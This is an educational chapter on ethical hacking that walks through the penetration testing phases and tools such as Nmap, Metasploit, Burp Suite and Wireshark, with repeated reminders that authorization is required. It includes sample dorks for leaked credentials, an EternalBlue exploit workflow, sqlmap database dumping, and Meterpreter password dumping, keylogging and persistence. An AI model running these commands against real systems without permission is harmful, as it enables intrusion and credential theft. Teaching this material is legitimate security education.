Chapter 9: Ethical Hacking & Penetration Testing Basics

Ethical Hacking & Penetration Testing Basics. This is the exciting “hands-on offensive” chapter—where we switch from defense to simulating attacks ethically (with permission!) to find weaknesses before real bad guys do. In January 2026 (right here in Airoli, Maharashtra, with the sun out and maybe some chai nearby ☕), ethical hacking is booming: India’s pentesting market is growing fast, companies need it for DPDP Act compliance, and tools like Kali are evolving with AI-assisted features and better ARM support.

Important reminder upfront: Everything here is for authorized testing only. Never test without written permission (RoE – Rules of Engagement). Unauthorized = illegal (IT Act 2000/2008 in India). We’re learning to be white-hat pros, not black-hats.

The standard ethical hacking/penetration testing methodology follows these phases (based on PTES, OSSTMM, NIST, and 2026 practices like EC-Council/CEH, Offensive Security):

1. Planning & Reconnaissance (Information Gathering / Footprinting)
2. Scanning & Enumeration
3. Gaining Access (Exploitation)
4. Maintaining Access (Post-Exploitation)
5. Covering Tracks (optional in ethical tests)
6. Reporting

Many sources combine or split them slightly, but this is the classic flow. In 2026, AI helps automate parts (recon, scanning), but human creativity is still king for chaining exploits.

Ethical Hacking Phases (Reconnaissance → Reporting)

Phase 1: Reconnaissance / Footprinting Goal: Gather as much intel as possible without touching the target (passive) or with minimal interaction (active). This builds the attack surface map.

• Passive Recon — No direct contact (no packets to target).
  • OSINT (Open Source Intelligence): WHOIS domain lookup, Shodan.io searches, LinkedIn/employee social media, job postings (tech stack leaks), DNS dumps (dnstwist, sublist3r).
  • Google Dorking (advanced search operators): Example: site:target.com filetype:pdf “confidential” → finds leaked docs. inurl:admin intitle:”login” site:*.in → admin panels in India domains. cache:target.com → old cached pages with forgotten info.
• Active Recon — Interact lightly (e.g., ping sweep, DNS queries). Example: Use dig or nslookup to find subdomains, MX records (email servers).

Real 2026 India example: For a Mumbai fintech client, recon finds exposed GitHub repos with API keys (via GitHub dorks like extension:env password), employee LinkedIn showing AWS usage, and Shodan revealing open RDP ports on public IPs.

Phase 2: Scanning & Enumeration Now interact directly to map live hosts, open ports, services, versions, users, shares.

• Scanning — Find live hosts + open ports/services. Tool: Nmap (Network Mapper) – Swiss army knife. Examples:
  • nmap -sn 192.168.1.0/24 → ping sweep (live hosts).
  • nmap -sS -p- -A target.com → stealth SYN scan, all ports, OS/service/version detection + scripts.
  • nmap –script vuln target.com → basic vuln scan.
• Enumeration — Dig deeper: users, shares, versions for exploits. Examples:
  • SMB: enum4linux or smbclient list shares/users.
  • SNMP: snmpwalk for config leaks.
  • Web: Dirb/Dirbuster/Gobuster for hidden dirs.
  • Vulnerability Scanners: Nessus/OpenVAS (free), Nikto for web, Nuclei (fast template-based).

2026 note: Nmap added better IPv6 support + AI-assisted script suggestions in recent versions.

Phase 3: Exploitation Basics Use discovered vulns to gain access.

• Basics: Match vuln (e.g., old Apache Struts CVE) to exploit code.
• Metasploit Framework — Exploit database + payload delivery. Example workflow:
  1. msfconsole
  2. search eternalblue → find module for WannaCry vuln (MS17-010).
  3. use exploit/windows/smb/ms17_010_eternalblue
  4. Set options (RHOSTS = target IP).
  5. exploit → gets Meterpreter shell if vulnerable.
• Other: Manual exploits (e.g., SQLmap for SQLi, sqlmap -u “http://target/login” –dbs).

Phase 4: Post-Exploitation Once in, what next? Maintain access, pivot, gather data, assess impact.

• Meterpreter (Metasploit payload): Upload/download files, keylog, screenshot, pivot to other machines. Examples: getuid (who am I?), hashdump (grab passwords), migrate to better process, portfwd for pivoting.
• Persistence: Add backdoor (e.g., scheduled task, registry run key), Golden Ticket (Kerberos).
• Pivoting: Use compromised host as jump box (e.g., route add in Meterpreter).
• Data exfil: upload/download, screenshot, keylog.

Phase 5: Reporting (Most important for ethical!) Document EVERYTHING: Scope, methodology, findings (CVSS scores), proof-of-concept screenshots, risk level, remediation steps. Structure: Executive summary → technical details → risk matrix → recommendations. Example: “High-risk SQL Injection in login form allowed DB dump (proof attached). Remediate: Use prepared statements + input validation.”

Tools: Kali Linux, Metasploit, Burp Suite, Wireshark

• Kali Linux (current: 2026.1 or later rolling releases as of Jan 2026) Debian-based pentest distro. Pre-installed 600+ tools. 2026 highlights: ZSH default shell, updated icons, new tools (AI-assisted?), NetHunter enhancements for mobile, Win-KeX for ARM. Use: Boot live USB/VM (VirtualBox/VMware), or install. apt update && apt full-upgrade.
• Metasploit Framework (Rapid7, open-source) Exploit framework. 2025/2026 updates: 139+ new modules, better AD relaying, ARM64 Meterpreter, exploits for SharePoint RCE, Oracle EBS, etc. Use: msfconsole → search/use/exploit.
• Burp Suite (PortSwigger) Web app pentest tool. Community (free) vs Pro (paid, with scanner). Features: Proxy intercept, repeater, intruder (brute-force), scanner (Pro), extensions. 2026: Strong contextual scanning, low false positives, great for API/web. Example: Intercept login request → tamper params → test for injection.
• Wireshark Packet analyzer (sniffer). Use: Capture traffic (e.g., tcp.port == 80), filter, analyze (e.g., HTTP creds in plain text). Example: On Wi-Fi (monitor mode + airmon-ng), capture unencrypted traffic to spot plaintext passwords.

Quick home lab tip (Airoli style): Install Kali in VirtualBox + Metasploitable 3 (vulnerable VM) + Windows XP/7 VM. Practice safely!

That’s Chapter 9—your first taste of offensive security! Feels empowering, right?